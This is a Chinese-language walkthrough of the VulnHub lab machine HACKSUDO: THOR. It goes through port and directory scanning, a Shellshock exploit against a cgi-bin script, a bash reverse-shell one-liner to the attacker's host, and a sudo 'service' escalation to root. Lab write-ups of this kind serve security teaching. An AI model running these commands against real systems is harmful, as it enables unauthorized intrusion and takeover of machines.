Vulnhub_HACKSUDO: THOR


本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.3.39
nivek:192.168.3.38

信息收集

使用nmap探测目标主机发现只开放了21、22、80三个端口

nmap -T4 -A -v -p- 192.168.3.38


访问80端口发现是一个登录页面

查看了网页中的源码没有发现可用的信息

在About-Us中得到了一些联系方式

通过目录扫描发现了一个cgi-bin的目录

dirb http://192.168.3.38 /usr/share/wordlists/dirb/big.txt


然后扫描cgi-bin下的可执行脚本,发现一个shell.sh

dirb http://192.168.3.38/cgi-bin/ -X .sh

GETSHELL

我们利用msf的检测模块验证存在shellshok漏洞

然后利用攻击模块获取shell

查看获取的shell权限发现是www权限

通过bash将msf的shell反弹到本机

bash -c 'bash -i >& /dev/tcp/192.168.3.39/4444 0>&1'


执行sudo -l发现有一个脚本可以以thor用户无密码用root身份执行

然后我们用python获取一个tty shell

python3 -c 'import pty; pty.spawn("/bin/bash");'


接着以thor身份执行脚本

获取thor身份的shell

获取thor的tty shell

提权

再执行sudo -l发现有cat、service可以利用

使用service提权至root

sudo service ../../bin/sh


进入root查看flag

加入我的星球

下方查看历史文章

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现

扫描二维码

获取更多精彩

NowSec

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值